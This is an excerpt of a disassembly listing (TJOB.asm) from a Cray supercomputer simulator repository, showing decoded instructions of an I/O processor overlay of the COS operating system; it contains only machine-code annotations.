] | 1 | 2021-12-29T15:59:25.000Z | 2021-12-29T15:59:25.000Z | target/cos_117/disasm/iop_overlay1/TJOB.asm | jrrk2/cray-sim | 52c9639808d6890517092637b188282c00cce4f7 | [
"BSL-1.0"
] | 6 | 2021-04-12T06:10:32.000Z | 2022-02-08T23:11:19.000Z | 0x0000 (0x000000) 0x2104- f:00020 d: 260 | A = OR[260]
0x0001 (0x000002) 0x290D- f:00024 d: 269 | OR[269] = A
0x0002 (0x000004) 0x2104- f:00020 d: 260 | A = OR[260]
0x0003 (0x000006) 0x1403- f:00012 d: 3 | A = A + 3 (0x0003)
0x0004 (0x000008) 0x1A00-0xFFFC f:00015 d: 0 | A = A & 65532 (0xFFFC)
0x0006 (0x00000C) 0x2904- f:00024 d: 260 | OR[260] = A
0x0007 (0x00000E) 0x2104- f:00020 d: 260 | A = OR[260]
0x0008 (0x000010) 0x291F- f:00024 d: 287 | OR[287] = A
0x0009 (0x000012) 0x1010- f:00010 d: 16 | A = 16 (0x0010)
0x000A (0x000014) 0x1428- f:00012 d: 40 | A = A + 40 (0x0028)
0x000B (0x000016) 0x1402- f:00012 d: 2 | A = A + 2 (0x0002)
0x000C (0x000018) 0x2504- f:00022 d: 260 | A = A + OR[260]
0x000D (0x00001A) 0x2904- f:00024 d: 260 | OR[260] = A
0x000E (0x00001C) 0x2104- f:00020 d: 260 | A = OR[260]
0x000F (0x00001E) 0x2705- f:00023 d: 261 | A = A - OR[261]
0x0010 (0x000020) 0xB234- f:00131 d: 52 | R = OR[52], C = 1
0x0011 (0x000022) 0x000B- f:00000 d: 11 | PASS | **** non-standard encoding with D:0x000B ****
0x0012 (0x000024) 0x210D- f:00020 d: 269 | A = OR[269]
0x0013 (0x000026) 0x3904- f:00034 d: 260 | (OR[260]) = A
0x0014 (0x000028) 0x2D04- f:00026 d: 260 | OR[260] = OR[260] + 1
0x0015 (0x00002A) 0x211F- f:00020 d: 287 | A = OR[287]
0x0016 (0x00002C) 0x1410- f:00012 d: 16 | A = A + 16 (0x0010)
0x0017 (0x00002E) 0x2920- f:00024 d: 288 | OR[288] = A
0x0018 (0x000030) 0x2120- f:00020 d: 288 | A = OR[288]
0x0019 (0x000032) 0x1428- f:00012 d: 40 | A = A + 40 (0x0028)
0x001A (0x000034) 0x2921- f:00024 d: 289 | OR[289] = A
0x001B (0x000036) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x001C (0x000038) 0x2922- f:00024 d: 290 | OR[290] = A
0x001D (0x00003A) 0x211E- f:00020 d: 286 | A = OR[286]
0x001E (0x00003C) 0x8402- f:00102 d: 2 | P = P + 2 (0x0020), A = 0
0x001F (0x00003E) 0x7013- f:00070 d: 19 | P = P + 19 (0x0032)
0x0020 (0x000040) 0x1026- f:00010 d: 38 | A = 38 (0x0026)
0x0021 (0x000042) 0x2925- f:00024 d: 293 | OR[293] = A
0x0022 (0x000044) 0x2118- f:00020 d: 280 | A = OR[280]
0x0023 (0x000046) 0x2926- f:00024 d: 294 | OR[294] = A
0x0024 (0x000048) 0x2119- f:00020 d: 281 | A = OR[281]
0x0025 (0x00004A) 0x2927- f:00024 d: 295 | OR[295] = A
0x0026 (0x00004C) 0x211F- f:00020 d: 287 | A = OR[287]
0x0027 (0x00004E) 0x2928- f:00024 d: 296 | OR[296] = A
0x0028 (0x000050) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x0029 (0x000052) 0x2929- f:00024 d: 297 | OR[297] = A
0x002A (0x000054) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x002B (0x000056) 0x292A- f:00024 d: 298 | OR[298] = A
0x002C (0x000058) 0x1125- f:00010 d: 293 | A = 293 (0x0125)
0x002D (0x00005A) 0x5800- f:00054 d: 0 | B = A
0x002E (0x00005C) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x002F (0x00005E) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0030 (0x000060) 0x2D19- f:00026 d: 281 | OR[281] = OR[281] + 1
0x0031 (0x000062) 0x2F1A- f:00027 d: 282 | OR[282] = OR[282] - 1
0x0032 (0x000064) 0x7E03-0x0291 f:00077 d: 3 | R = OR[3]+657 (0x0291)
0x0034 (0x000068) 0x2003- f:00020 d: 3 | A = OR[3]
0x0035 (0x00006A) 0x1C00-0x02B3 f:00016 d: 0 | A = A + 691 (0x02B3)
0x0037 (0x00006E) 0x2913- f:00024 d: 275 | OR[275] = A
0x0038 (0x000070) 0x1014- f:00010 d: 20 | A = 20 (0x0014)
0x0039 (0x000072) 0x2914- f:00024 d: 276 | OR[276] = A
0x003A (0x000074) 0x101E- f:00010 d: 30 | A = 30 (0x001E)
0x003B (0x000076) 0x2915- f:00024 d: 277 | OR[277] = A
0x003C (0x000078) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x003E (0x00007C) 0x7E03-0x0277 f:00077 d: 3 | R = OR[3]+631 (0x0277)
0x0040 (0x000080) 0x7E03-0x0291 f:00077 d: 3 | R = OR[3]+657 (0x0291)
0x0042 (0x000084) 0x2003- f:00020 d: 3 | A = OR[3]
0x0043 (0x000086) 0x1C00-0x02BE f:00016 d: 0 | A = A + 702 (0x02BE)
0x0045 (0x00008A) 0x2913- f:00024 d: 275 | OR[275] = A
0x0046 (0x00008C) 0x1005- f:00010 d: 5 | A = 5 (0x0005)
0x0047 (0x00008E) 0x2914- f:00024 d: 276 | OR[276] = A
0x0048 (0x000090) 0x1044- f:00010 d: 68 | A = 68 (0x0044)
0x0049 (0x000092) 0x2915- f:00024 d: 277 | OR[277] = A
0x004A (0x000094) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x004C (0x000098) 0x211D- f:00020 d: 285 | A = OR[285]
0x004D (0x00009A) 0x2913- f:00024 d: 275 | OR[275] = A
0x004E (0x00009C) 0x1002- f:00010 d: 2 | A = 2 (0x0002)
0x004F (0x00009E) 0x2914- f:00024 d: 276 | OR[276] = A
0x0050 (0x0000A0) 0x104A- f:00010 d: 74 | A = 74 (0x004A)
0x0051 (0x0000A2) 0x2915- f:00024 d: 277 | OR[277] = A
0x0052 (0x0000A4) 0x75AB- f:00072 d: 427 | R = P + 427 (0x01FD)
0x0053 (0x0000A6) 0x7E03-0x0277 f:00077 d: 3 | R = OR[3]+631 (0x0277)
0x0055 (0x0000AA) 0x7E03-0x0291 f:00077 d: 3 | R = OR[3]+657 (0x0291)
0x0057 (0x0000AE) 0x2003- f:00020 d: 3 | A = OR[3]
0x0058 (0x0000B0) 0x1C00-0x02C1 f:00016 d: 0 | A = A + 705 (0x02C1)
0x005A (0x0000B4) 0x2913- f:00024 d: 275 | OR[275] = A
0x005B (0x0000B6) 0x1011- f:00010 d: 17 | A = 17 (0x0011)
0x005C (0x0000B8) 0x2914- f:00024 d: 276 | OR[276] = A
0x005D (0x0000BA) 0x1027- f:00010 d: 39 | A = 39 (0x0027)
0x005E (0x0000BC) 0x2915- f:00024 d: 277 | OR[277] = A
0x005F (0x0000BE) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x0061 (0x0000C2) 0x7E03-0x0277 f:00077 d: 3 | R = OR[3]+631 (0x0277)
0x0063 (0x0000C6) 0x7E03-0x0291 f:00077 d: 3 | R = OR[3]+657 (0x0291)
0x0065 (0x0000CA) 0x2003- f:00020 d: 3 | A = OR[3]
0x0066 (0x0000CC) 0x1C00-0x02CA f:00016 d: 0 | A = A + 714 (0x02CA)
0x0068 (0x0000D0) 0x2913- f:00024 d: 275 | OR[275] = A
0x0069 (0x0000D2) 0x1049- f:00010 d: 73 | A = 73 (0x0049)
0x006A (0x0000D4) 0x2914- f:00024 d: 276 | OR[276] = A
0x006B (0x0000D6) 0x1004- f:00010 d: 4 | A = 4 (0x0004)
0x006C (0x0000D8) 0x2915- f:00024 d: 277 | OR[277] = A
0x006D (0x0000DA) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x006F (0x0000DE) 0x7E03-0x0277 f:00077 d: 3 | R = OR[3]+631 (0x0277)
0x0071 (0x0000E2) 0x7E03-0x0291 f:00077 d: 3 | R = OR[3]+657 (0x0291)
0x0073 (0x0000E6) 0x2003- f:00020 d: 3 | A = OR[3]
0x0074 (0x0000E8) 0x1C00-0x02EF f:00016 d: 0 | A = A + 751 (0x02EF)
0x0076 (0x0000EC) 0x2913- f:00024 d: 275 | OR[275] = A
0x0077 (0x0000EE) 0x1049- f:00010 d: 73 | A = 73 (0x0049)
0x0078 (0x0000F0) 0x2914- f:00024 d: 276 | OR[276] = A
0x0079 (0x0000F2) 0x1004- f:00010 d: 4 | A = 4 (0x0004)
0x007A (0x0000F4) 0x2915- f:00024 d: 277 | OR[277] = A
0x007B (0x0000F6) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x007D (0x0000FA) 0x7E03-0x0277 f:00077 d: 3 | R = OR[3]+631 (0x0277)
0x007F (0x0000FE) 0x7E03-0x0291 f:00077 d: 3 | R = OR[3]+657 (0x0291)
0x0081 (0x000102) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x0082 (0x000104) 0x2923- f:00024 d: 291 | OR[291] = A
0x0083 (0x000106) 0x211E- f:00020 d: 286 | A = OR[286]
0x0084 (0x000108) 0x8602- f:00103 d: 2 | P = P + 2 (0x0086), A # 0
0x0085 (0x00010A) 0x7013- f:00070 d: 19 | P = P + 19 (0x0098)
0x0086 (0x00010C) 0x2003- f:00020 d: 3 | A = OR[3]
0x0087 (0x00010E) 0x1C00-0x03A6 f:00016 d: 0 | A = A + 934 (0x03A6)
0x0089 (0x000112) 0x2913- f:00024 d: 275 | OR[275] = A
0x008A (0x000114) 0x100D- f:00010 d: 13 | A = 13 (0x000D)
0x008B (0x000116) 0x2914- f:00024 d: 276 | OR[276] = A
0x008C (0x000118) 0x1022- f:00010 d: 34 | A = 34 (0x0022)
0x008D (0x00011A) 0x2915- f:00024 d: 277 | OR[277] = A
0x008E (0x00011C) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x0090 (0x000120) 0x7E03-0x0277 f:00077 d: 3 | R = OR[3]+631 (0x0277)
0x0092 (0x000124) 0x7E03-0x0291 f:00077 d: 3 | R = OR[3]+657 (0x0291)
0x0094 (0x000128) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0095 (0x00012A) 0x291A- f:00024 d: 282 | OR[282] = A
0x0096 (0x00012C) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0097 (0x00012E) 0x2923- f:00024 d: 291 | OR[291] = A
0x0098 (0x000130) 0x2122- f:00020 d: 290 | A = OR[290]
0x0099 (0x000132) 0x271C- f:00023 d: 284 | A = A - OR[284]
0x009A (0x000134) 0x854F- f:00102 d: 335 | P = P + 335 (0x01E9), A = 0
0x009B (0x000136) 0x211A- f:00020 d: 282 | A = OR[282]
0x009C (0x000138) 0x8602- f:00103 d: 2 | P = P + 2 (0x009E), A # 0
0x009D (0x00013A) 0x7135- f:00070 d: 309 | P = P + 309 (0x01D2)
0x009E (0x00013C) 0x1026- f:00010 d: 38 | A = 38 (0x0026)
0x009F (0x00013E) 0x2925- f:00024 d: 293 | OR[293] = A
0x00A0 (0x000140) 0x2118- f:00020 d: 280 | A = OR[280]
0x00A1 (0x000142) 0x2926- f:00024 d: 294 | OR[294] = A
0x00A2 (0x000144) 0x2119- f:00020 d: 281 | A = OR[281]
0x00A3 (0x000146) 0x2927- f:00024 d: 295 | OR[295] = A
0x00A4 (0x000148) 0x211F- f:00020 d: 287 | A = OR[287]
0x00A5 (0x00014A) 0x2928- f:00024 d: 296 | OR[296] = A
0x00A6 (0x00014C) 0x1004- f:00010 d: 4 | A = 4 (0x0004)
0x00A7 (0x00014E) 0x2929- f:00024 d: 297 | OR[297] = A
0x00A8 (0x000150) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x00A9 (0x000152) 0x292A- f:00024 d: 298 | OR[298] = A
0x00AA (0x000154) 0x1125- f:00010 d: 293 | A = 293 (0x0125)
0x00AB (0x000156) 0x5800- f:00054 d: 0 | B = A
0x00AC (0x000158) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x00AD (0x00015A) 0x7C09- f:00076 d: 9 | R = OR[9]
0x00AE (0x00015C) 0x1004- f:00010 d: 4 | A = 4 (0x0004)
0x00AF (0x00015E) 0x2B19- f:00025 d: 281 | OR[281] = A + OR[281]
0x00B0 (0x000160) 0x211A- f:00020 d: 282 | A = OR[282]
0x00B1 (0x000162) 0x1604- f:00013 d: 4 | A = A - 4 (0x0004)
0x00B2 (0x000164) 0x291A- f:00024 d: 282 | OR[282] = A
0x00B3 (0x000166) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x00B4 (0x000168) 0x2924- f:00024 d: 292 | OR[292] = A
0x00B5 (0x00016A) 0x211F- f:00020 d: 287 | A = OR[287]
0x00B6 (0x00016C) 0x140B- f:00012 d: 11 | A = A + 11 (0x000B)
0x00B7 (0x00016E) 0x2908- f:00024 d: 264 | OR[264] = A
0x00B8 (0x000170) 0x3108- f:00030 d: 264 | A = (OR[264])
0x00B9 (0x000172) 0x2913- f:00024 d: 275 | OR[275] = A
0x00BA (0x000174) 0x1005- f:00010 d: 5 | A = 5 (0x0005)
0x00BB (0x000176) 0x2914- f:00024 d: 276 | OR[276] = A
0x00BC (0x000178) 0x1003- f:00010 d: 3 | A = 3 (0x0003)
0x00BD (0x00017A) 0x2915- f:00024 d: 277 | OR[277] = A
0x00BE (0x00017C) 0x753F- f:00072 d: 319 | R = P + 319 (0x01FD)
0x00BF (0x00017E) 0x1008- f:00010 d: 8 | A = 8 (0x0008)
0x00C0 (0x000180) 0x0801- f:00004 d: 1 | A = A > 1 (0x0001)
0x00C1 (0x000182) 0x251F- f:00022 d: 287 | A = A + OR[287]
0x00C2 (0x000184) 0x2913- f:00024 d: 275 | OR[275] = A
0x00C3 (0x000186) 0x1007- f:00010 d: 7 | A = 7 (0x0007)
0x00C4 (0x000188) 0x2914- f:00024 d: 276 | OR[276] = A
0x00C5 (0x00018A) 0x100A- f:00010 d: 10 | A = 10 (0x000A)
0x00C6 (0x00018C) 0x2915- f:00024 d: 277 | OR[277] = A
0x00C7 (0x00018E) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x00C9 (0x000192) 0x211F- f:00020 d: 287 | A = OR[287]
0x00CA (0x000194) 0x140D- f:00012 d: 13 | A = A + 13 (0x000D)
0x00CB (0x000196) 0x2908- f:00024 d: 264 | OR[264] = A
0x00CC (0x000198) 0x3108- f:00030 d: 264 | A = (OR[264])
0x00CD (0x00019A) 0x2913- f:00024 d: 275 | OR[275] = A
0x00CE (0x00019C) 0x2113- f:00020 d: 275 | A = OR[275]
0x00CF (0x00019E) 0x1E00-0x494E f:00017 d: 0 | A = A - 18766 (0x494E)
0x00D1 (0x0001A2) 0x8602- f:00103 d: 2 | P = P + 2 (0x00D3), A # 0
0x00D2 (0x0001A4) 0x7003- f:00070 d: 3 | P = P + 3 (0x00D5)
0x00D3 (0x0001A6) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x00D4 (0x0001A8) 0x2924- f:00024 d: 292 | OR[292] = A
0x00D5 (0x0001AA) 0x211F- f:00020 d: 287 | A = OR[287]
0x00D6 (0x0001AC) 0x1404- f:00012 d: 4 | A = A + 4 (0x0004)
0x00D7 (0x0001AE) 0x2908- f:00024 d: 264 | OR[264] = A
0x00D8 (0x0001B0) 0x3108- f:00030 d: 264 | A = (OR[264])
0x00D9 (0x0001B2) 0x080F- f:00004 d: 15 | A = A > 15 (0x000F)
0x00DA (0x0001B4) 0x2913- f:00024 d: 275 | OR[275] = A
0x00DB (0x0001B6) 0x2113- f:00020 d: 275 | A = OR[275]
0x00DC (0x0001B8) 0x8402- f:00102 d: 2 | P = P + 2 (0x00DE), A = 0
0x00DD (0x0001BA) 0x7011- f:00070 d: 17 | P = P + 17 (0x00EE)
0x00DE (0x0001BC) 0x211F- f:00020 d: 287 | A = OR[287]
0x00DF (0x0001BE) 0x1407- f:00012 d: 7 | A = A + 7 (0x0007)
0x00E0 (0x0001C0) 0x2908- f:00024 d: 264 | OR[264] = A
0x00E1 (0x0001C2) 0x3108- f:00030 d: 264 | A = (OR[264])
0x00E2 (0x0001C4) 0x12FF- f:00011 d: 255 | A = A & 255 (0x00FF)
0x00E3 (0x0001C6) 0x2913- f:00024 d: 275 | OR[275] = A
0x00E4 (0x0001C8) 0x2113- f:00020 d: 275 | A = OR[275]
0x00E5 (0x0001CA) 0x1641- f:00013 d: 65 | A = A - 65 (0x0041)
0x00E6 (0x0001CC) 0x0A02- f:00005 d: 2 | A = A < 2 (0x0002)
0x00E7 (0x0001CE) 0x2403- f:00022 d: 3 | A = A + OR[3]
0x00E8 (0x0001D0) 0x1C00-0x0314 f:00016 d: 0 | A = A + 788 (0x0314)
0x00EA (0x0001D4) 0x2913- f:00024 d: 275 | OR[275] = A
0x00EB (0x0001D6) 0x1006- f:00010 d: 6 | A = 6 (0x0006)
0x00EC (0x0001D8) 0x2914- f:00024 d: 276 | OR[276] = A
0x00ED (0x0001DA) 0x7007- f:00070 d: 7 | P = P + 7 (0x00F4)
0x00EE (0x0001DC) 0x1020- f:00010 d: 32 | A = 32 (0x0020)
0x00EF (0x0001DE) 0x0801- f:00004 d: 1 | A = A > 1 (0x0001)
0x00F0 (0x0001E0) 0x251F- f:00022 d: 287 | A = A + OR[287]
0x00F1 (0x0001E2) 0x2913- f:00024 d: 275 | OR[275] = A
0x00F2 (0x0001E4) 0x1008- f:00010 d: 8 | A = 8 (0x0008)
0x00F3 (0x0001E6) 0x2914- f:00024 d: 276 | OR[276] = A
0x00F4 (0x0001E8) 0x1014- f:00010 d: 20 | A = 20 (0x0014)
0x00F5 (0x0001EA) 0x2915- f:00024 d: 277 | OR[277] = A
0x00F6 (0x0001EC) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x00F8 (0x0001F0) 0x211F- f:00020 d: 287 | A = OR[287]
0x00F9 (0x0001F2) 0x1409- f:00012 d: 9 | A = A + 9 (0x0009)
0x00FA (0x0001F4) 0x2908- f:00024 d: 264 | OR[264] = A
0x00FB (0x0001F6) 0x3108- f:00030 d: 264 | A = (OR[264])
0x00FC (0x0001F8) 0x0804- f:00004 d: 4 | A = A > 4 (0x0004)
0x00FD (0x0001FA) 0x120F- f:00011 d: 15 | A = A & 15 (0x000F)
0x00FE (0x0001FC) 0x2913- f:00024 d: 275 | OR[275] = A
0x00FF (0x0001FE) 0x1002- f:00010 d: 2 | A = 2 (0x0002)
0x0100 (0x000200) 0x2914- f:00024 d: 276 | OR[276] = A
0x0101 (0x000202) 0x101C- f:00010 d: 28 | A = 28 (0x001C)
0x0102 (0x000204) 0x2915- f:00024 d: 277 | OR[277] = A
0x0103 (0x000206) 0x74FA- f:00072 d: 250 | R = P + 250 (0x01FD)
0x0104 (0x000208) 0x211F- f:00020 d: 287 | A = OR[287]
0x0105 (0x00020A) 0x1409- f:00012 d: 9 | A = A + 9 (0x0009)
0x0106 (0x00020C) 0x2908- f:00024 d: 264 | OR[264] = A
0x0107 (0x00020E) 0x3108- f:00030 d: 264 | A = (OR[264])
0x0108 (0x000210) 0x120F- f:00011 d: 15 | A = A & 15 (0x000F)
0x0109 (0x000212) 0x2913- f:00024 d: 275 | OR[275] = A
0x010A (0x000214) 0x2113- f:00020 d: 275 | A = OR[275]
0x010B (0x000216) 0x2513- f:00022 d: 275 | A = A + OR[275]
0x010C (0x000218) 0x1C00-0x037C f:00016 d: 0 | A = A + 892 (0x037C)
0x010E (0x00021C) 0x2403- f:00022 d: 3 | A = A + OR[3]
0x010F (0x00021E) 0x2913- f:00024 d: 275 | OR[275] = A
0x0110 (0x000220) 0x1002- f:00010 d: 2 | A = 2 (0x0002)
0x0111 (0x000222) 0x2914- f:00024 d: 276 | OR[276] = A
0x0112 (0x000224) 0x101E- f:00010 d: 30 | A = 30 (0x001E)
0x0113 (0x000226) 0x2915- f:00024 d: 277 | OR[277] = A
0x0114 (0x000228) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x0116 (0x00022C) 0x1005- f:00010 d: 5 | A = 5 (0x0005)
0x0117 (0x00022E) 0x2914- f:00024 d: 276 | OR[276] = A
0x0118 (0x000230) 0x1022- f:00010 d: 34 | A = 34 (0x0022)
0x0119 (0x000232) 0x2915- f:00024 d: 277 | OR[277] = A
0x011A (0x000234) 0x2124- f:00020 d: 292 | A = OR[292]
0x011B (0x000236) 0x8402- f:00102 d: 2 | P = P + 2 (0x011D), A = 0
0x011C (0x000238) 0x702B- f:00070 d: 43 | P = P + 43 (0x0147)
0x011D (0x00023A) 0x311F- f:00030 d: 287 | A = (OR[287])
0x011E (0x00023C) 0x0808- f:00004 d: 8 | A = A > 8 (0x0008)
0x011F (0x00023E) 0x2913- f:00024 d: 275 | OR[275] = A
0x0120 (0x000240) 0x2113- f:00020 d: 275 | A = OR[275]
0x0121 (0x000242) 0x8402- f:00102 d: 2 | P = P + 2 (0x0123), A = 0
0x0122 (0x000244) 0x701E- f:00070 d: 30 | P = P + 30 (0x0140)
0x0123 (0x000246) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0124 (0x000248) 0x0801- f:00004 d: 1 | A = A > 1 (0x0001)
0x0125 (0x00024A) 0x251F- f:00022 d: 287 | A = A + OR[287]
0x0126 (0x00024C) 0x2913- f:00024 d: 275 | OR[275] = A
0x0127 (0x00024E) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x0128 (0x000250) 0x2925- f:00024 d: 293 | OR[293] = A
0x0129 (0x000252) 0x1800-0x000F f:00014 d: 0 | A = 15 (0x000F)
0x012B (0x000256) 0x2926- f:00024 d: 294 | OR[294] = A
0x012C (0x000258) 0x2113- f:00020 d: 275 | A = OR[275]
0x012D (0x00025A) 0x2927- f:00024 d: 295 | OR[295] = A
0x012E (0x00025C) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x012F (0x00025E) 0x2928- f:00024 d: 296 | OR[296] = A
0x0130 (0x000260) 0x1018- f:00010 d: 24 | A = 24 (0x0018)
0x0131 (0x000262) 0x2929- f:00024 d: 297 | OR[297] = A
0x0132 (0x000264) 0x2120- f:00020 d: 288 | A = OR[288]
0x0133 (0x000266) 0x292A- f:00024 d: 298 | OR[298] = A
0x0134 (0x000268) 0x2115- f:00020 d: 277 | A = OR[277]
0x0135 (0x00026A) 0x292B- f:00024 d: 299 | OR[299] = A
0x0136 (0x00026C) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x0137 (0x00026E) 0x292C- f:00024 d: 300 | OR[300] = A
0x0138 (0x000270) 0x2114- f:00020 d: 276 | A = OR[276]
0x0139 (0x000272) 0x292D- f:00024 d: 301 | OR[301] = A
0x013A (0x000274) 0x1125- f:00010 d: 293 | A = 293 (0x0125)
0x013B (0x000276) 0x5800- f:00054 d: 0 | B = A
0x013C (0x000278) 0x1800-0x1B18 f:00014 d: 0 | A = 6936 (0x1B18)
0x013E (0x00027C) 0x7C09- f:00076 d: 9 | R = OR[9]
0x013F (0x00027E) 0x7007- f:00070 d: 7 | P = P + 7 (0x0146)
0x0140 (0x000280) 0x2003- f:00020 d: 3 | A = OR[3]
0x0141 (0x000282) 0x1C00-0x03B4 f:00016 d: 0 | A = A + 948 (0x03B4)
0x0143 (0x000286) 0x2913- f:00024 d: 275 | OR[275] = A
0x0144 (0x000288) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x0146 (0x00028C) 0x7007- f:00070 d: 7 | P = P + 7 (0x014D)
0x0147 (0x00028E) 0x2003- f:00020 d: 3 | A = OR[3]
0x0148 (0x000290) 0x1C00-0x03AD f:00016 d: 0 | A = A + 941 (0x03AD)
0x014A (0x000294) 0x2913- f:00024 d: 275 | OR[275] = A
0x014B (0x000296) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x014D (0x00029A) 0x1005- f:00010 d: 5 | A = 5 (0x0005)
0x014E (0x00029C) 0x2914- f:00024 d: 276 | OR[276] = A
0x014F (0x00029E) 0x102A- f:00010 d: 42 | A = 42 (0x002A)
0x0150 (0x0002A0) 0x2915- f:00024 d: 277 | OR[277] = A
0x0151 (0x0002A2) 0x2124- f:00020 d: 292 | A = OR[292]
0x0152 (0x0002A4) 0x8402- f:00102 d: 2 | P = P + 2 (0x0154), A = 0
0x0153 (0x0002A6) 0x702E- f:00070 d: 46 | P = P + 46 (0x0181)
0x0154 (0x0002A8) 0x211F- f:00020 d: 287 | A = OR[287]
0x0155 (0x0002AA) 0x1408- f:00012 d: 8 | A = A + 8 (0x0008)
0x0156 (0x0002AC) 0x2908- f:00024 d: 264 | OR[264] = A
0x0157 (0x0002AE) 0x3108- f:00030 d: 264 | A = (OR[264])
0x0158 (0x0002B0) 0x0808- f:00004 d: 8 | A = A > 8 (0x0008)
0x0159 (0x0002B2) 0x2913- f:00024 d: 275 | OR[275] = A
0x015A (0x0002B4) 0x2113- f:00020 d: 275 | A = OR[275]
0x015B (0x0002B6) 0x8402- f:00102 d: 2 | P = P + 2 (0x015D), A = 0
0x015C (0x0002B8) 0x701E- f:00070 d: 30 | P = P + 30 (0x017A)
0x015D (0x0002BA) 0x1010- f:00010 d: 16 | A = 16 (0x0010)
0x015E (0x0002BC) 0x0801- f:00004 d: 1 | A = A > 1 (0x0001)
0x015F (0x0002BE) 0x251F- f:00022 d: 287 | A = A + OR[287]
0x0160 (0x0002C0) 0x2913- f:00024 d: 275 | OR[275] = A
0x0161 (0x0002C2) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x0162 (0x0002C4) 0x2925- f:00024 d: 293 | OR[293] = A
0x0163 (0x0002C6) 0x1800-0x000F f:00014 d: 0 | A = 15 (0x000F)
0x0165 (0x0002CA) 0x2926- f:00024 d: 294 | OR[294] = A
0x0166 (0x0002CC) 0x2113- f:00020 d: 275 | A = OR[275]
0x0167 (0x0002CE) 0x2927- f:00024 d: 295 | OR[295] = A
0x0168 (0x0002D0) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0169 (0x0002D2) 0x2928- f:00024 d: 296 | OR[296] = A
0x016A (0x0002D4) 0x1018- f:00010 d: 24 | A = 24 (0x0018)
0x016B (0x0002D6) 0x2929- f:00024 d: 297 | OR[297] = A
0x016C (0x0002D8) 0x2120- f:00020 d: 288 | A = OR[288]
0x016D (0x0002DA) 0x292A- f:00024 d: 298 | OR[298] = A
0x016E (0x0002DC) 0x2115- f:00020 d: 277 | A = OR[277]
0x016F (0x0002DE) 0x292B- f:00024 d: 299 | OR[299] = A
0x0170 (0x0002E0) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x0171 (0x0002E2) 0x292C- f:00024 d: 300 | OR[300] = A
0x0172 (0x0002E4) 0x2114- f:00020 d: 276 | A = OR[276]
0x0173 (0x0002E6) 0x292D- f:00024 d: 301 | OR[301] = A
0x0174 (0x0002E8) 0x1125- f:00010 d: 293 | A = 293 (0x0125)
0x0175 (0x0002EA) 0x5800- f:00054 d: 0 | B = A
0x0176 (0x0002EC) 0x1800-0x1B18 f:00014 d: 0 | A = 6936 (0x1B18)
0x0178 (0x0002F0) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0179 (0x0002F2) 0x7007- f:00070 d: 7 | P = P + 7 (0x0180)
0x017A (0x0002F4) 0x2003- f:00020 d: 3 | A = OR[3]
0x017B (0x0002F6) 0x1C00-0x03B4 f:00016 d: 0 | A = A + 948 (0x03B4)
0x017D (0x0002FA) 0x2913- f:00024 d: 275 | OR[275] = A
0x017E (0x0002FC) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x0180 (0x000300) 0x7007- f:00070 d: 7 | P = P + 7 (0x0187)
0x0181 (0x000302) 0x2003- f:00020 d: 3 | A = OR[3]
0x0182 (0x000304) 0x1C00-0x03AD f:00016 d: 0 | A = A + 941 (0x03AD)
0x0184 (0x000308) 0x2913- f:00024 d: 275 | OR[275] = A
0x0185 (0x00030A) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x0187 (0x00030E) 0x211F- f:00020 d: 287 | A = OR[287]
0x0188 (0x000310) 0x140A- f:00012 d: 10 | A = A + 10 (0x000A)
0x0189 (0x000312) 0x2908- f:00024 d: 264 | OR[264] = A
0x018A (0x000314) 0x3108- f:00030 d: 264 | A = (OR[264])
0x018B (0x000316) 0x2913- f:00024 d: 275 | OR[275] = A
0x018C (0x000318) 0x1006- f:00010 d: 6 | A = 6 (0x0006)
0x018D (0x00031A) 0x2914- f:00024 d: 276 | OR[276] = A
0x018E (0x00031C) 0x1032- f:00010 d: 50 | A = 50 (0x0032)
0x018F (0x00031E) 0x2915- f:00024 d: 277 | OR[277] = A
0x0190 (0x000320) 0x2124- f:00020 d: 292 | A = OR[292]
0x0191 (0x000322) 0x8402- f:00102 d: 2 | P = P + 2 (0x0193), A = 0
0x0192 (0x000324) 0x7003- f:00070 d: 3 | P = P + 3 (0x0195)
0x0193 (0x000326) 0x746A- f:00072 d: 106 | R = P + 106 (0x01FD)
0x0194 (0x000328) 0x7007- f:00070 d: 7 | P = P + 7 (0x019B)
0x0195 (0x00032A) 0x2003- f:00020 d: 3 | A = OR[3]
0x0196 (0x00032C) 0x1C00-0x03B0 f:00016 d: 0 | A = A + 944 (0x03B0)
0x0198 (0x000330) 0x2913- f:00024 d: 275 | OR[275] = A
0x0199 (0x000332) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
